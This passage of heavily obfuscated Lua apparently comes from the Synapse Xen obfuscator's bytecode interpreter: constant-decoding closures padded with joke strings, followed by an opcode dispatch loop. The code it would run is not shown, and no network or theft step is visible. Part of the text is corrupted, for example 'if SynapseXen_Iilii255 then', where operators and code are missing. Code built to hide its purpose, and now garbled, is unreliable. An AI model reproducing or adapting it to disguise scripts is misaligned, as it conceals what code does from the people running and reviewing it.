end;SynapseXen_iIIIIiiIll[1673501406]=SynapseXen_lIIiIIiIilIIIl(SynapseXen_lIIiIIiIilIIIl(2449473885,SynapseXen_lliil),SynapseXen_lIIiIIiIilIIIl(2246289881,SynapseXen_IliiIilii))-string.len(SynapseXen_iliiIlill)-#{794971626,446775470,2398486177,4026828041,3376117525,2222366345}return SynapseXen_iIIIIiiIll[1673501406]end)(6061,{},14165,"iIlIlllIiIllliiiii","llliiliiIIIIllIli"))then SynapseXen_iilIlIlIII[1010673982]=SynapseXen_llilllIIliI(SynapseXen_lIiilIlllIIiiilllil,15,32)-131071 end;SynapseXen_ilIIIiIIl[SynapseXen_ilIiIlii]=SynapseXen_iilIlIlIII end;SynapseXen_IIiliilIlliiIilI()SynapseXen_IIiliilIlliiIilI()SynapseXen_iiIiIII[1582391118]=SynapseXen_lIIiIIiIilIIIl(SynapseXen_IIiliilIlliiIilI(),SynapseXen_iIIIIiiIll[945088739]or(function(...)local SynapseXen_iliiIlill="thats how mafia works"local SynapseXen_lliil=SynapseXen_illIIIIlilIIiIIlii(415416159,21164583)local SynapseXen_IiliiliiiiiIililIlIl={...}for SynapseXen_ilIIiiIilllliliIIil,SynapseXen_ilIIii in pairs(SynapseXen_IiliiliiiiiIililIlIl)do local SynapseXen_llIIilliilIll;local SynapseXen_IiiIliiIllliiIlIIl=type(SynapseXen_ilIIii)if SynapseXen_IiiIliiIllliiIlIIl=="number"then SynapseXen_llIIilliilIll=SynapseXen_ilIIii elseif SynapseXen_IiiIliiIllliiIlIIl=="string"then SynapseXen_llIIilliilIll=SynapseXen_ilIIii:len()elseif SynapseXen_IiiIliiIllliiIlIIl=="table"then SynapseXen_llIIilliilIll=SynapseXen_illIIIIlilIIiIIlii(2985172765,1309792151)end;SynapseXen_lliil=SynapseXen_lliil-SynapseXen_llIIilliilIll end;SynapseXen_iIIIIiiIll[945088739]=SynapseXen_lIIiIIiIilIIIl(SynapseXen_lIIiIIiIilIIIl(907877398,SynapseXen_lliil),SynapseXen_lIIiIIiIilIIIl(1410281012,SynapseXen_llIIllllIlI[4]))-string.len(SynapseXen_iliiIlill)-#{526000051,1531458499,1505360125,402415801}return SynapseXen_iIIIIiiIll[945088739]end)("lIlIiIil","IlilIIiiiIlliIiI",{},257))SynapseXen_IIiliilIlliiIilI()SynapseXen_ililiiII()SynapseXen_iiIiIII[970458831]=SynapseXen_lIIiIIiIilIIIl(SynapseXen_IIiliilIlliiIilI(),SynapseXen_iIIIIiiIll[3277543040]or(function()local SynapseXen_iliiIlill="i put more time into this shitty list of dead memes then i did into the obfuscator itself"SynapseXen_iIIIIiiIll[3277543040]=SynapseXen_lIIiIIiIilIIIl(SynapseXen_illIIIIlilIIiIIlii(4156982098,1484806104),SynapseXen_lIIiIIiIilIIIl(1644356450,SynapseXen_llIIllllIlI[7]))-string.len(SynapseXen_iliiIlill)-#{1704838905,3372065101,725157456,168475307,2918855639,558634910,1090741382,4245945602,3871931647}return SynapseXen_iIIIIiiIll[3277543040]end)())SynapseXen_IIiliilIlliiIilI()for SynapseXen_ilIiIlii=1,SynapseXen_lIIiIIiIilIIIl(SynapseXen_iIiIilIIliiIi(),SynapseXen_iIIIIiiIll[3374979157]or(function(...)local SynapseXen_iliiIlill="now with shitty xor string obfuscation"local SynapseXen_lliil=SynapseXen_illIIIIlilIIiIIlii(206950421,4270998200)local SynapseXen_IiliiliiiiiIililIlIl={...}for SynapseXen_ilIIiiIilllliliIIil,SynapseXen_ilIIii in pairs(SynapseXen_IiliiliiiiiIililIlIl)do local SynapseXen_llIIilliilIll;local SynapseXen_IiiIliiIllliiIlIIl=type(SynapseXen_ilIIii)if SynapseXen_IiiIliiIllliiIlIIl=="number"then SynapseXen_llIIilliilIll=SynapseXen_ilIIii elseif SynapseXen_IiiIliiIllliiIlIIl=="string"then SynapseXen_llIIilliilIll=SynapseXen_ilIIii:len()elseif SynapseXen_IiiIliiIllliiIlIIl=="table"then SynapseXen_llIIilliilIll=SynapseXen_illIIIIlilIIiIIlii(394584649,3900379193)end;SynapseXen_lliil=SynapseXen_lliil+SynapseXen_llIIilliilIll end;SynapseXen_iIIIIiiIll[3374979157]=SynapseXen_lIIiIIiIilIIIl(SynapseXen_lIIiIIiIilIIIl(1802574026,SynapseXen_lliil),SynapseXen_lIIiIIiIilIIIl(3868832501,SynapseXen_llIIllllIlI[1]))-string.len(SynapseXen_iliiIlill)-#{2256854737,3630217597,2435112750,2152719413,470300053,2269492930,2834857678}return SynapseXen_iIIIIiiIll[3374979157]end)(10651,12703,11817,"Iil","IliIililII","II","iIIllilliiIi"))do local SynapseXen_llIlIlIlIIIilIIlilii=SynapseXen_IIiliilIlliiIilI()local SynapseXen_ilIlIIIIiiilII;if SynapseXen_llIlIlIlIIIilIIlilii==(SynapseXen_iIIIIiiIll[3190301043]or(function()local SynapseXen_iliiIlill="aspect network better obfuscator"SynapseXen_iIIIIiiIll[3190301043]=SynapseXen_lIIiIIiIilIIIl(SynapseXen_illIIIIlilIIiIIlii(916223308,4111256228),SynapseXen_lIIiIIiIilIIIl(2459216649,SynapseXen_llIIllllIlI[5]))-string.len(SynapseXen_iliiIlill)-#{3435107723,2356343262,704894963}return SynapseXen_iIIIIiiIll[3190301043]end)())then SynapseXen_ilIlIIIIiiilII=SynapseXen_IIiliilIlliiIilI()~=0 elseif SynapseXen_llIlIlIlIIIilIIlilii==(SynapseXen_iIIIIiiIll[544924885]or(function()local SynapseXen_iliiIlill="what are you trying to say? that fucking one dot + dot + dot + many dots is not adding adding 1 dot + dot and then adding all the dots together????"SynapseXen_iIIIIiiIll[544924885]=SynapseXen_lIIiIIiIilIIIl(SynapseXen_illIIIIlilIIiIIlii(2007848026,3666200234),SynapseXen_lIIiIIiIilIIIl(3602468873,SynapseXen_llIIllllIlI[4]))-string.len(SynapseXen_iliiIlill)-#{1901042419,3961450241,1021192121,2804990231}return SynapseXen_iIIIIiiIll[544924885]end)())then SynapseXen_ilIlIIIIiiilII=SynapseXen_liliilil()elseif SynapseXen_llIlIlIlIIIilIIlilii==(SynapseXen_iIIIIiiIll[3341670155]or(function(...)local SynapseXen_iliiIlill="skisploit is the superior obfuscator, clearly."local SynapseXen_lliil=SynapseXen_illIIIIlilIIiIIlii(2205870792,963406828)local SynapseXen_IiliiliiiiiIililIlIl={...}for SynapseXen_ilIIiiIilllliliIIil,SynapseXen_ilIIii in pairs(SynapseXen_IiliiliiiiiIililIlIl)do local SynapseXen_llIIilliilIll;local SynapseXen_IiiIliiIllliiIlIIl=type(SynapseXen_ilIIii)if SynapseXen_IiiIliiIllliiIlIIl=="number"then SynapseXen_llIIilliilIll=SynapseXen_ilIIii elseif SynapseXen_IiiIliiIllliiIlIIl=="string"then SynapseXen_llIIilliilIll=SynapseXen_ilIIii:len()elseif SynapseXen_IiiIliiIllliiIlIIl=="table"then SynapseXen_llIIilliilIll=SynapseXen_illIIIIlilIIiIIlii(1902068762,2392891216)end;SynapseXen_lliil=SynapseXen_lliil+SynapseXen_llIIilliilIll end;SynapseXen_iIIIIiiIll[3341670155]=SynapseXen_lIIiIIiIilIIIl(SynapseXen_lIIiIIiIilIIIl(1899479598,SynapseXen_lliil),SynapseXen_lIIiIIiIilIIIl(2964552234,SynapseXen_llIIllllIlI[4]))-string.len(SynapseXen_iliiIlill)-#{3413702825,2440068767,420699631,1013971297,3811997264}return SynapseXen_iIIIIiiIll[3341670155]end)("iiiiiIiIIIIIll",1294,3071,"iiiIlii",{},"li","IllliIil"))then SynapseXen_ilIlIIIIiiilII=SynapseXen_lliIIiIlllIiIl(SynapseXen_ilillIlIlIlIlIli(SynapseXen_IlIIIIiilliIlIli()),1,-2)end;SynapseXen_iiiIIIiIIlI[SynapseXen_ilIiIlii-1]=SynapseXen_ilIlIIIIiiilII end;for SynapseXen_ilIiIlii=1,SynapseXen_lIIiIIiIilIIIl(SynapseXen_iIiIilIIliiIi(),SynapseXen_iIIIIiiIll[3745152024]or(function()local SynapseXen_iliiIlill="baby i just fell for uwu,,,,,, i wanna be with uwu!11!!"SynapseXen_iIIIIiiIll[3745152024]=SynapseXen_lIIiIIiIilIIIl(SynapseXen_illIIIIlilIIiIIlii(3001218300,2380160320),SynapseXen_lIIiIIiIilIIIl(1851700534,SynapseXen_llIIllllIlI[7]))-string.len(SynapseXen_iliiIlill)-#{210514114,38190868,1778534138,2523381444,3448114143,325541554,2750157417,3200682995}return SynapseXen_iIIIIiiIll[3745152024]end)())do SynapseXen_iIlliiillI[SynapseXen_ilIiIlii-1]=SynapseXen_lIIIlIllIll()end;return SynapseXen_iiIiIII end;do assert(SynapseXen_IlIIIIiilliIlIli(4)=="\27Xen","Synapse Xen - Failed to verify bytecode. Please make sure your Lua implementation supports non-null terminated strings.")SynapseXen_iIiIilIIliiIi=SynapseXen_ililiiII;SynapseXen_IllliIliiliI=SynapseXen_ililiiII;local SynapseXen_llIIililIlIliillIlI=SynapseXen_IlIIIIiilliIlIli()SynapseXen_ililiiII()SynapseXen_IliiIilii=SynapseXen_iillIlIiiiiIi(SynapseXen_iIiIilIIliiIi())SynapseXen_ililiiII()SynapseXen_ililiiII()local SynapseXen_IlIIiIllIiIIlIillIII=0;for SynapseXen_ilIIiiIilllliliIIil=1,#SynapseXen_llIIililIlIliillIlI do local SynapseXen_llIiIiIliI=SynapseXen_llIIililIlIliillIlI:sub(SynapseXen_ilIIiiIilllliliIIil,SynapseXen_ilIIiiIilllliliIIil)SynapseXen_IlIIiIllIiIIlIillIII=SynapseXen_IlIIiIllIiIIlIillIII+string.byte(SynapseXen_llIiIiIliI)end;SynapseXen_IlIIiIllIiIIlIillIII=SynapseXen_lIIiIIiIilIIIl(SynapseXen_IlIIiIllIiIIlIillIII,SynapseXen_IliiIilii)for SynapseXen_ilIiIlii=1,SynapseXen_IIiliilIlliiIilI()do SynapseXen_llIIllllIlI[SynapseXen_ilIiIlii]=SynapseXen_iIlIiIlIil(SynapseXen_iIiIilIIliiIi(),SynapseXen_IlIIiIllIiIIlIillIII)end;SynapseXen_iIiIIlliilliI()end;return SynapseXen_lIIIlIllIll()end;local function SynapseXen_IIiiiiIlIlllilililI(...)return SynapseXen_lIIiIiiiIl('#',...),{...}end;local function SynapseXen_iliilIiIilIii(SynapseXen_iiIiIII,SynapseXen_illIIliil,SynapseXen_liiiliIIIiiIlIll)local SynapseXen_ilIIIiIIl=SynapseXen_iiIiIII[SynapseXen_iIIIIiiIll[3949058139]or(function(...)local SynapseXen_iliiIlill="sponsored by ironbrew, jk xen is better"local SynapseXen_lliil=SynapseXen_illIIIIlilIIiIIlii(3765702986,2330699258)local SynapseXen_IiliiliiiiiIililIlIl={...}for SynapseXen_ilIIiiIilllliliIIil,SynapseXen_ilIIii in pairs(SynapseXen_IiliiliiiiiIililIlIl)do local SynapseXen_llIIilliilIll;local SynapseXen_IiiIliiIllliiIlIIl=type(SynapseXen_ilIIii)if SynapseXen_IiiIliiIllliiIlIIl=="number"then SynapseXen_llIIilliilIll=SynapseXen_ilIIii elseif SynapseXen_IiiIliiIllliiIlIIl=="string"then SynapseXen_llIIilliilIll=SynapseXen_ilIIii:len()elseif SynapseXen_IiiIliiIllliiIlIIl=="table"then SynapseXen_llIIilliilIll=SynapseXen_illIIIIlilIIiIIlii(4062694205,232264639)end;SynapseXen_lliil=SynapseXen_lliil+SynapseXen_llIIilliilIll end;SynapseXen_iIIIIiiIll[3949058139]=SynapseXen_lIIiIIiIilIIIl(SynapseXen_lIIiIIiIilIIIl(2080115543,SynapseXen_lliil),SynapseXen_lIIiIIiIilIIIl(2301477881,SynapseXen_IliiIilii))-string.len(SynapseXen_iliiIlill)-#{1750576328,2358986481,2641618807,3999146407,2324983478,674668817}return SynapseXen_iIIIIiiIll[3949058139]end)({},"ilIiIIlIliiIIllIil","IllililiIi",{},"lIiilliillIi","iIIIili",6495,11166,"lllIlililliIii")]local SynapseXen_iIlliiillI=SynapseXen_iiIiIII[SynapseXen_iIIIIiiIll[494538311]or(function()local SynapseXen_iliiIlill="this is a christian obfuscator, no cursing allowed in our scripts"SynapseXen_iIIIIiiIll[494538311]=SynapseXen_lIIiIIiIilIIIl(SynapseXen_illIIIIlilIIiIIlii(1177280950,3421171883),SynapseXen_lIIiIIiIilIIIl(1812453119,SynapseXen_llIIllllIlI[1]))-string.len(SynapseXen_iliiIlill)-#{283701196,2099695827,2604174574,1480273764,3157909769,1578702942,1696652068,1937885278}return SynapseXen_iIIIIiiIll[494538311]end)()]local SynapseXen_iiiIIIiIIlI=SynapseXen_iiIiIII[SynapseXen_iIIIIiiIll[4028302266]or(function()local SynapseXen_iliiIlill="wait for someone on devforum to say they are gonna deobfuscate this"SynapseXen_iIIIIiiIll[4028302266]=SynapseXen_lIIiIIiIilIIIl(SynapseXen_illIIIIlilIIiIIlii(3766530902,2497484390),SynapseXen_lIIiIIiIilIIIl(1448011205,SynapseXen_llIIllllIlI[6]))-string.len(SynapseXen_iliiIlill)-#{3520358665,2240056417,3205540183}return SynapseXen_iIIIIiiIll[4028302266]end)()]return function(...)local SynapseXen_IIlII,SynapseXen_illliIiii=1,-1;local SynapseXen_lllIlliiIlIIiIlill,SynapseXen_IIlliiIili={},SynapseXen_lIIiIiiiIl('#',...)-1;local SynapseXen_IlIlIIIIIl=0;local SynapseXen_illlll={}local SynapseXen_iliillIiIiiII={}local SynapseXen_IillIIIlIiliIiI=setmetatable({},{__index=SynapseXen_illlll,__newindex=function(SynapseXen_iliiIliiIIli,SynapseXen_iIIIIlIIiIIIil,SynapseXen_lilIIili)if SynapseXen_iIIIIlIIiIIIil>SynapseXen_illliIiii then SynapseXen_illliIiii=SynapseXen_iIIIIlIIiIIIil end;SynapseXen_illlll[SynapseXen_iIIIIlIIiIIIil]=SynapseXen_lilIIili end})local function SynapseXen_IiiiIiIllIllIIlllIl()local SynapseXen_iilIlIlIII,SynapseXen_iiiIIiliiiIlilIlIIi;while true do SynapseXen_iilIlIlIII=SynapseXen_ilIIIiIIl[SynapseXen_IIlII]SynapseXen_iiiIIiliiiIlilIlIIi=SynapseXen_iilIlIlIII[544186938]SynapseXen_IIlII=SynapseXen_IIlII+1;if SynapseXen_iiiIIiliiiIlilIlIIi==45 then local SynapseXen_liiilIli=SynapseXen_illIiillliIIIill(SynapseXen_iilIlIlIII[1055476718],81,256)local SynapseXen_Iilii=SynapseXen_lIIiIIiIilIIIl(SynapseXen_iilIlIlIII[954173160],35)local SynapseXen_iiIlIiIIIIiillIIIIll=SynapseXen_IillIIIlIiliIiI;local SynapseXen_IiiliiiIIli,SynapseXen_lIIil;local SynapseXen_lIiiIlliIlil;if SynapseXen_Iilii==1 then return elseif SynapseXen_Iilii==0 then SynapseXen_lIiiIlliIlil=SynapseXen_illliIiii else SynapseXen_lIiiIlliIlil=SynapseXen_liiilIli+SynapseXen_Iilii-2 end;SynapseXen_lIIil={}SynapseXen_IiiliiiIIli=0;for SynapseXen_ilIiIlii=SynapseXen_liiilIli,SynapseXen_lIiiIlliIlil do SynapseXen_IiiliiiIIli=SynapseXen_IiiliiiIIli+1;SynapseXen_lIIil[SynapseXen_IiiliiiIIli]=SynapseXen_iiIlIiIIIIiillIIIIll[SynapseXen_ilIiIlii]end;return SynapseXen_lIIil,SynapseXen_IiiliiiIIli elseif SynapseXen_iiiIIiliiiIlilIlIIi==112 then local SynapseXen_Iilii=SynapseXen_IilIlIiIl(SynapseXen_iilIlIlIII[954173160],106,512)local SynapseXen_llIiIiIliI=SynapseXen_IilIlIiIl(SynapseXen_iilIlIlIII[1102161443],26,512)local SynapseXen_iiIlIiIIIIiillIIIIll=SynapseXen_IillIIIlIiliIiI;if SynapseXen_Iilii>255 then SynapseXen_Iilii=SynapseXen_iiiIIIiIIlI[SynapseXen_Iilii-256]else SynapseXen_Iilii=SynapseXen_iiIlIiIIIIiillIIIIll[SynapseXen_Iilii]end;if SynapseXen_llIiIiIliI>255 then SynapseXen_llIiIiIliI=SynapseXen_iiiIIIiIIlI[SynapseXen_llIiIiIliI-256]else SynapseXen_llIiIiIliI=SynapseXen_iiIlIiIIIIiillIIIIll[SynapseXen_llIiIiIliI]end;SynapseXen_iiIlIiIIIIiillIIIIll[SynapseXen_lIIiIIiIilIIIl(SynapseXen_iilIlIlIII[1055476718],120)]=SynapseXen_Iilii%SynapseXen_llIiIiIliI elseif SynapseXen_iiiIIiliiiIlilIlIIi==169 then local SynapseXen_liiilIli=SynapseXen_IilIlIiIl(SynapseXen_iilIlIlIII[1055476718],73,256)local SynapseXen_Iilii=SynapseXen_lIIiIIiIilIIIl(SynapseXen_iilIlIlIII[954173160],6)local SynapseXen_iiIlIiIIIIiillIIIIll,SynapseXen_lilIiIIIIIIl=SynapseXen_IillIIIlIiliIiI,SynapseXen_lllIlliiIlIIiIlill;SynapseXen_illliIiii=SynapseXen_liiilIli-1;for SynapseXen_ilIiIlii=SynapseXen_liiilIli,SynapseXen_liiilIli+(SynapseXen_Iilii>0 and SynapseXen_Iilii-1 or SynapseXen_IIlliiIili)do SynapseXen_iiIlIiIIIIiillIIIIll[SynapseXen_ilIiIlii]=SynapseXen_lilIiIIIIIIl[SynapseXen_ilIiIlii-SynapseXen_liiilIli]end elseif SynapseXen_iiiIIiliiiIlilIlIIi==163 then local SynapseXen_liiilIli=SynapseXen_lIIiIIiIilIIIl(SynapseXen_iilIlIlIII[1055476718],50)~=0;local SynapseXen_Iilii=SynapseXen_IilIlIiIl(SynapseXen_iilIlIlIII[954173160],111,512)local SynapseXen_llIiIiIliI=SynapseXen_IilIlIiIl(SynapseXen_iilIlIlIII[1102161443],113,512)local SynapseXen_iiIlIiIIIIiillIIIIll=SynapseXen_IillIIIlIiliIiI;if SynapseXen_Iilii>255 then SynapseXen_Iilii=SynapseXen_iiiIIIiIIlI[SynapseXen_Iilii-256]else SynapseXen_Iilii=SynapseXen_iiIlIiIIIIiillIIIIll[SynapseXen_Iilii]end;if SynapseXen_llIiIiIliI>255 then SynapseXen_llIiIiIliI=SynapseXen_iiiIIIiIIlI[SynapseXen_llIiIiIliI-256]else SynapseXen_llIiIiIliI=SynapseXen_iiIlIiIIIIiillIIIIll[SynapseXen_llIiIiIliI]end;if SynapseXen_Iilii255 then SynapseXen_Iilii=SynapseXen_iiiIIIiIIlI[SynapseXen_Iilii-256]else SynapseXen_Iilii=SynapseXen_iiIlIiIIIIiillIIIIll[SynapseXen_Iilii]end;if SynapseXen_llIiIiIliI>255 then SynapseXen_llIiIiIliI=SynapseXen_iiiIIIiIIlI[SynapseXen_llIiIiIliI-256]else SynapseXen_llIiIiIliI=SynapseXen_iiIlIiIIIIiillIIIIll[SynapseXen_llIiIiIliI]end;SynapseXen_iiIlIiIIIIiillIIIIll[SynapseXen_IilIlIiIl(SynapseXen_iilIlIlIII[1055476718],66,256)]=SynapseXen_Iilii/SynapseXen_llIiIiIliI elseif SynapseXen_iiiIIiliiiIlilIlIIi==252 then local SynapseXen_liiilIli=SynapseXen_lIIiIIiIilIIIl(SynapseXen_iilIlIlIII[1055476718],87)local SynapseXen_iiIlIiIIIIiillIIIIll=SynapseXen_IillIIIlIiliIiI;local SynapseXen_llIliIiIliIIiIii=SynapseXen_iiIlIiIIIIiillIIIIll[SynapseXen_liiilIli+2]local SynapseXen_IllllIll=SynapseXen_iiIlIiIIIIiillIIIIll[SynapseXen_liiilIli]+SynapseXen_llIliIiIliIIiIii;SynapseXen_iiIlIiIIIIiillIIIIll[SynapseXen_liiilIli]=SynapseXen_IllllIll;if SynapseXen_llIliIiIliIIiIii>0 then if SynapseXen_IllllIll<=SynapseXen_iiIlIiIIIIiillIIIIll[SynapseXen_liiilIli+1]then SynapseXen_IIlII=SynapseXen_IIlII+SynapseXen_iilIlIlIII[1010673982]SynapseXen_iiIlIiIIIIiillIIIIll[SynapseXen_liiilIli+3]=SynapseXen_IllllIll end else if SynapseXen_IllllIll>=SynapseXen_iiIlIiIIIIiillIIIIll[SynapseXen_liiilIli+1]then SynapseXen_IIlII=SynapseXen_IIlII+SynapseXen_iilIlIlIII[1010673982]SynapseXen_iiIlIiIIIIiillIIIIll[SynapseXen_liiilIli+3]=SynapseXen_IllllIll end end elseif SynapseXen_iiiIIiliiiIlilIlIIi==52 then if not not SynapseXen_IillIIIlIiliIiI[SynapseXen_illIiillliIIIill(SynapseXen_iilIlIlIII[1055476718],75,256)]==(SynapseXen_illIiillliIIIill(SynapseXen_iilIlIlIII[1102161443],15,512)==0)then SynapseXen_IIlII=SynapseXen_IIlII+1 end elseif SynapseXen_iiiIIiliiiIlilIlIIi==144 then SynapseXen_liiiliIIIiiIlIll[SynapseXen_illIiillliIIIill(SynapseXen_iilIlIlIII[954173160],105,512)]=SynapseXen_IillIIIlIiliIiI[SynapseXen_illIiillliIIIill(SynapseXen_iilIlIlIII[1055476718],64,256)]elseif SynapseXen_iiiIIiliiiIlilIlIIi==25 then local SynapseXen_liiilIli=SynapseXen_IilIlIiIl(SynapseXen_iilIlIlIII[1055476718],109,256)local SynapseXen_iiIlIiIIIIiillIIIIll=SynapseXen_IillIIIlIiliIiI;SynapseXen_iiIlIiIIIIiillIIIIll[SynapseXen_liiilIli]=assert(tonumber(SynapseXen_iiIlIiIIIIiillIIIIll[SynapseXen_liiilIli]),'`for` initial value must be a number')SynapseXen_iiIlIiIIIIiillIIIIll[SynapseXen_liiilIli+1]=assert(tonumber(SynapseXen_iiIlIiIIIIiillIIIIll[SynapseXen_liiilIli+1]),'`for` limit must be a number')SynapseXen_iiIlIiIIIIiillIIIIll[SynapseXen_liiilIli+2]=assert(tonumber(SynapseXen_iiIlIiIIIIiillIIIIll[SynapseXen_liiilIli+2]),'`for` step must be a number')SynapseXen_iiIlIiIIIIiillIIIIll[SynapseXen_liiilIli]=SynapseXen_iiIlIiIIIIiillIIIIll[SynapseXen_liiilIli]-SynapseXen_iiIlIiIIIIiillIIIIll[SynapseXen_liiilIli+2]SynapseXen_IIlII=SynapseXen_IIlII+SynapseXen_iilIlIlIII[1010673982]elseif SynapseXen_iiiIIiliiiIlilIlIIi==36 then local SynapseXen_liiilIli=SynapseXen_IilIlIiIl(SynapseXen_iilIlIlIII[1055476718],91,256)local SynapseXen_Iilii=SynapseXen_IilIlIiIl(SynapseXen_iilIlIlIII[954173160],122,512)local SynapseXen_llIiIiIliI=SynapseXen_IilIlIiIl(SynapseXen_illIiillliIIIill(SynapseXen_iilIlIlIII[1102161443],69,512),SynapseXen_IlIlIIIIIl,512)local SynapseXen_iiIlIiIIIIiillIIIIll=SynapseXen_IillIIIlIiliIiI;if SynapseXen_llIiIiIliI==0 then SynapseXen_IIlII=SynapseXen_IIlII+1;SynapseXen_llIiIiIliI=SynapseXen_ilIIIiIIl[SynapseXen_IIlII][476925695]end;local SynapseXen_liIliiIll=(SynapseXen_llIiIiIliI-1)*50;local SynapseXen_IIlliIIIiIIll=SynapseXen_iiIlIiIIIIiillIIIIll[SynapseXen_liiilIli]if SynapseXen_Iilii==0 then SynapseXen_Iilii=SynapseXen_illliIiii-SynapseXen_liiilIli end;for SynapseXen_ilIiIlii=1,SynapseXen_Iilii do SynapseXen_IIlliIIIiIIll[SynapseXen_liIliiIll+SynapseXen_ilIiIlii]=SynapseXen_iiIlIiIIIIiillIIIIll[SynapseXen_liiilIli+SynapseXen_ilIiIlii]end elseif SynapseXen_iiiIIiliiiIlilIlIIi==175 then local SynapseXen_liiilIli=SynapseXen_IilIlIiIl(SynapseXen_iilIlIlIII[1055476718],71,256)local SynapseXen_llIiIiIliI=SynapseXen_IilIlIiIl(SynapseXen_lIIiIIiIilIIIl(SynapseXen_iilIlIlIII[1102161443],47),SynapseXen_IlIlIIIIIl,512)local SynapseXen_iiIlIiIIIIiillIIIIll=SynapseXen_IillIIIlIiliIiI;local SynapseXen_liIliiIll=SynapseXen_liiilIli+2;local SynapseXen_illIIiiIilIiIi={SynapseXen_iiIlIiIIIIiillIIIIll[SynapseXen_liiilIli](SynapseXen_iiIlIiIIIIiillIIIIll[SynapseXen_liiilIli+1],SynapseXen_iiIlIiIIIIiillIIIIll[SynapseXen_liiilIli+2])}for SynapseXen_ilIiIlii=1,SynapseXen_llIiIiIliI do SynapseXen_IillIIIlIiliIiI[SynapseXen_liIliiIll+SynapseXen_ilIiIlii]=SynapseXen_illIIiiIilIiIi[SynapseXen_ilIiIlii]end;if SynapseXen_iiIlIiIIIIiillIIIIll[SynapseXen_liiilIli+3]~=nil then SynapseXen_iiIlIiIIIIiillIIIIll[SynapseXen_liiilIli+2]=SynapseXen_iiIlIiIIIIiillIIIIll[SynapseXen_liiilIli+3]else SynapseXen_IIlII=SynapseXen_IIlII+1 end elseif SynapseXen_iiiIIiliiiIlilIlIIi==236 then local SynapseXen_Iilii=SynapseXen_IilIlIiIl(SynapseXen_iilIlIlIII[954173160],21,512)local SynapseXen_llIiIiIliI=SynapseXen_illIiillliIIIill(SynapseXen_iilIlIlIII[1102161443],110,512)local SynapseXen_iiIlIiIIIIiillIIIIll=SynapseXen_IillIIIlIiliIiI;if SynapseXen_Iilii>255 then SynapseXen_Iilii=SynapseXen_iiiIIIiIIlI[SynapseXen_Iilii-256]else SynapseXen_Iilii=SynapseXen_iiIlIiIIIIiillIIIIll[SynapseXen_Iilii]end;if SynapseXen_llIiIiIliI>255 then SynapseXen_llIiIiIliI=SynapseXen_iiiIIIiIIlI[SynapseXen_llIiIiIliI-256]else SynapseXen_llIiIiIliI=SynapseXen_iiIlIiIIIIiillIIIIll[SynapseXen_llIiIiIliI]end;SynapseXen_iiIlIiIIIIiillIIIIll[SynapseXen_illIiillliIIIill(SynapseXen_lIIiIIiIilIIIl(SynapseXen_iilIlIlIII[1055476718],9),SynapseXen_IlIlIIIIIl,256)]=SynapseXen_Iilii*SynapseXen_llIiIiIliI elseif SynapseXen_iiiIIiliiiIlilIlIIi==5 then local SynapseXen_liiilIli=SynapseXen_lIIiIIiIilIIIl(SynapseXen_iilIlIlIII[1055476718],42)local SynapseXen_Iilii=SynapseXen_illIiillliIIIill(SynapseXen_IilIlIiIl(SynapseXen_iilIlIlIII[954173160],58,512),SynapseXen_IlIlIIIIIl,512)local SynapseXen_iiIlIiIIIIiillIIIIll=SynapseXen_IillIIIlIiliIiI;local SynapseXen_IlIllIiliIIi,SynapseXen_liIIll;local SynapseXen_lIiiIlliIlil;local SynapseXen_illIiIIllIllii=0;SynapseXen_IlIllIiliIIi={}if SynapseXen_Iilii~=1 then if SynapseXen_Iilii~=0 then SynapseXen_lIiiIlliIlil=SynapseXen_liiilIli+SynapseXen_Iilii-1 else SynapseXen_lIiiIlliIlil=SynapseXen_illliIiii end;for SynapseXen_ilIiIlii=SynapseXen_liiilIli+1,SynapseXen_lIiiIlliIlil do SynapseXen_IlIllIiliIIi[#SynapseXen_IlIllIiliIIi+1]=SynapseXen_iiIlIiIIIIiillIIIIll[SynapseXen_ilIiIlii]end;SynapseXen_liIIll={SynapseXen_iiIlIiIIIIiillIIIIll[SynapseXen_liiilIli](unpack(SynapseXen_IlIllIiliIIi,1,SynapseXen_lIiiIlliIlil-SynapseXen_liiilIli))}else SynapseXen_liIIll={SynapseXen_iiIlIiIIIIiillIIIIll[SynapseXen_liiilIli]()}end;for SynapseXen_IllllIll in next,SynapseXen_liIIll do if SynapseXen_IllllIll>SynapseXen_illIiIIllIllii then SynapseXen_illIiIIllIllii=SynapseXen_IllllIll end end;return SynapseXen_liIIll,SynapseXen_illIiIIllIllii elseif SynapseXen_iiiIIiliiiIlilIlIIi==106 then if SynapseXen_lIIiIIiIilIIIl(SynapseXen_IilIlIiIl(SynapseXen_iilIlIlIII[2061944757],3484,262144),SynapseXen_IlIlIIIIIl)==7442 then SynapseXen_IillIIIlIiliIiI[SynapseXen_lIIiIIiIilIIIl(SynapseXen_iilIlIlIII[1055476718],66)]=SynapseXen_IliiIilii else SynapseXen_IillIIIlIiliIiI[SynapseXen_lIIiIIiIilIIIl(SynapseXen_iilIlIlIII[1055476718],66)]=SynapseXen_llIIllllIlI[SynapseXen_lIIiIIiIilIIIl(SynapseXen_IilIlIiIl(SynapseXen_iilIlIlIII[2061944757],3484,262144),SynapseXen_IlIlIIIIIl)]end elseif SynapseXen_iiiIIiliiiIlilIlIIi==119 then local SynapseXen_liiilIli=SynapseXen_lIIiIIiIilIIIl(SynapseXen_iilIlIlIII[1055476718],15)local SynapseXen_Iilii=SynapseXen_IilIlIiIl(SynapseXen_iilIlIlIII[954173160],96,512)local SynapseXen_llIiIiIliI=SynapseXen_IilIlIiIl(SynapseXen_iilIlIlIII[1102161443],101,512)local SynapseXen_iiIlIiIIIIiillIIIIll=SynapseXen_IillIIIlIiliIiI;local SynapseXen_IlIllIiliIIi,SynapseXen_liIIll;local SynapseXen_lIiiIlliIlil,SynapseXen_IiiliiiIIli;SynapseXen_IlIllIiliIIi={}if SynapseXen_Iilii~=1 then if SynapseXen_Iilii~=0 then SynapseXen_lIiiIlliIlil=SynapseXen_liiilIli+SynapseXen_Iilii-1 else SynapseXen_lIiiIlliIlil=SynapseXen_illliIiii end;SynapseXen_IiiliiiIIli=0;for SynapseXen_ilIiIlii=SynapseXen_liiilIli+1,SynapseXen_lIiiIlliIlil do SynapseXen_IiiliiiIIli=SynapseXen_IiiliiiIIli+1;SynapseXen_IlIllIiliIIi[SynapseXen_IiiliiiIIli]=SynapseXen_iiIlIiIIIIiillIIIIll[SynapseXen_ilIiIlii]end;SynapseXen_lIiiIlliIlil,SynapseXen_liIIll=SynapseXen_IIiiiiIlIlllilililI(SynapseXen_iiIlIiIIIIiillIIIIll[SynapseXen_liiilIli](unpack(SynapseXen_IlIllIiliIIi,1,SynapseXen_lIiiIlliIlil-SynapseXen_liiilIli)))else 